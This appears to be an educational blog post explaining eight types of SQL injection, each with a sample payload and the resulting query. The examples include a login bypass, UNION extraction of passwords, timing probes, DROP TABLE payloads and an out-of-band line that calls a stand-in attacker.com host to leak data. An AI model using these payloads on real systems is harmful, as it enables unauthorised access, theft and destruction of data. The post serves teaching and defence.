SQL Injection

-

 SQL Injection

1. Classic (In-band) SQL Injection

Definition: Attacker directly manipulates SQL queries via input fields.

Example:

The end-user enters into the online form field: ' OR 1=1 --

SQL: SELECT * FROM user WHERE username = '' OR 1=1 --' AND psswrd = '';

W Returns all users, bypassing login.

2. Error-Based SQL Injection

Definition: Uses error messages returned by the SQL database to learn about structure.

Example:

The end-user enters into the online form field: ' ORDER BY 10 --

SQL: SELECT * FROM products ORDER BY 10 --'

W If there are fewer than 10 columns, the DB returns an error revealing column info.

3. Union-Based SQL Injection

Definition: Uses the SQL UNION operator to combine results from multiple SELECT statements.

Example:

The end-user enters into the online form field:

 ' UNION SELECT username, password FROM users --

SQL: SELECT name FROM products WHERE id = '' UNION SELECT username, password FROM users --';

W Combines product and user data into one result set.

4. Blind SQL Injection (Boolean-Based)

Definition: No visible errors, but attacker infers from application behavior.

Example:

The end-user enters into the online form field: ' AND 1=1 --

SQL: SELECT * FROM users WHERE username = 'admin' AND 1=1 --'

W Page loads normally.

Input: ' AND 1=2 --

SQL: SELECT * FROM users WHERE username = 'admin' AND 1=2 --'

W Page behaves differently, helping attacker deduce logic.

 

5. Time-Based Blind SQL Injection

Definition: Uses database delays to infer information.

Example (MySQL):

Input: ' OR IF(1=1, SLEEP(5), 0) --

SQL: SELECT * FROM users WHERE username = '' OR IF(1=1, SLEEP(5), 0) --'

W If query takes 5 seconds to respond, attacker confirms condition is true.

6. Out-of-Band SQL Injection

Definition: Exfiltrates data using network protocols (e.g., DNS or HTTP).

Example:

Input: '; EXEC xp_dirtree '\\attacker.com\share' --

W On SQL Server, this sends a request to attacker’s server, leaking data.

7. Second-Order SQL Injection

Definition: Injected SQL is stored in the DB and executed later.

Example:

  1. Attacker registers with username: bob'); DROP TABLE users; --
  2. Later, admin panel runs:

SELECT * FROM users WHERE username = 'bob'); DROP TABLE users; --'

W Table users is dropped.

8. Stored SQL Injection

Definition: SQL injection payload is permanently stored in the database.

Example:

  • Attacker leaves a comment:
    Nice post'); DROP TABLE posts; --
  • Later, admin views the comments:

SELECT * FROM comments WHERE post_id = 42;

W If the app reuses the input unsafely, the posts table could be dropped.

 




Comments

Post a Comment

Popular posts from this blog

The Seven Different Types of Coding Blocks in Java

-
Java   Coding Blocks    In Java , the term "coding block" typically refers to a block of code within certain constructs that define the scope and execution context of variables and statements. There are several types of coding blocks in Java, each serving different purposes. Here’s an overview: 1. Method Block A  Java  method block is the section of code within a method. It defines the scope of local variables and contains the statements that make up the method. public class MyClass { public void myMethod () { // Method block starts here int localVariable = 10 ; System.out.println(localVariable); // Method block ends here } } 2. Class Block A  Java  class block is the section of code within a class definition. It contains the class’s fields (variables), methods, and nested classes. public class MyClass { // Class block starts here int instanceVariable; // Field public void myMet...
Read more

How big is an int in Java

-
Image
Integer Data types in  Java   // 8 bits // -128 to 127 0000 0001 b = -128; System.out.println("b " + b); b = 127; System.out.println("b " + b); // short integer  in Java // 00000000 00000000 short s = (short)b; // 16 bit // cast from a number datatype to another number datatype s = 500; b = (byte)s; System.out.println("b " + b); // int in  Java // 00000000 00000000 00000000 00000001 int i = (int)s ; // 32 bit ; binary integer 0 1 ; 00000000 8 bits= 1byte // long integer in  Java // 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000001 long l = (long)i; // 64-bit // float in  Java // single-precision 32-bit // 0 and manitissa of 23 bits and exponent of 8 bits // 0.01234567900123456789012 x 10*12345678 float f = 0.0f; // double in  Java double d = 3048575658.00 * 728348716381.00; // double-precision 64-bit d = (double) f; // cast float to double double-precision 64-bit
Read more

Can You Name 20 Databases That Use SQL?

-
Image
Can You Name 20 Databases That Use SQL ? Here are 20 popular databases that use SQL : MySQL – Open-source, widely used for web applications, uses  SQL PostgreSQL – Advanced, open-source, with extensive features,  uses  SQL . Microsoft SQL Server – Microsoft's enterprise-level database,  uses  SQL . Oracle Database – Powerful, widely used for enterprise applications,  uses  SQL . SQLite – Lightweight, embedded database often used in mobile applications. MariaDB – Fork of MySQL, commonly used in web applications. IBM Db2 – IBM’s database system, used in enterprise applications. Amazon RDS – Managed  SQL  database service by AWS. Google Cloud SQL – Fully-managed database service by Google Cloud. Amazon Aurora – High-performance, cloud-native relational database. SAP HANA – High-performance, in-memory database  uses  SQL . Sybase ASE (Adap...
Read more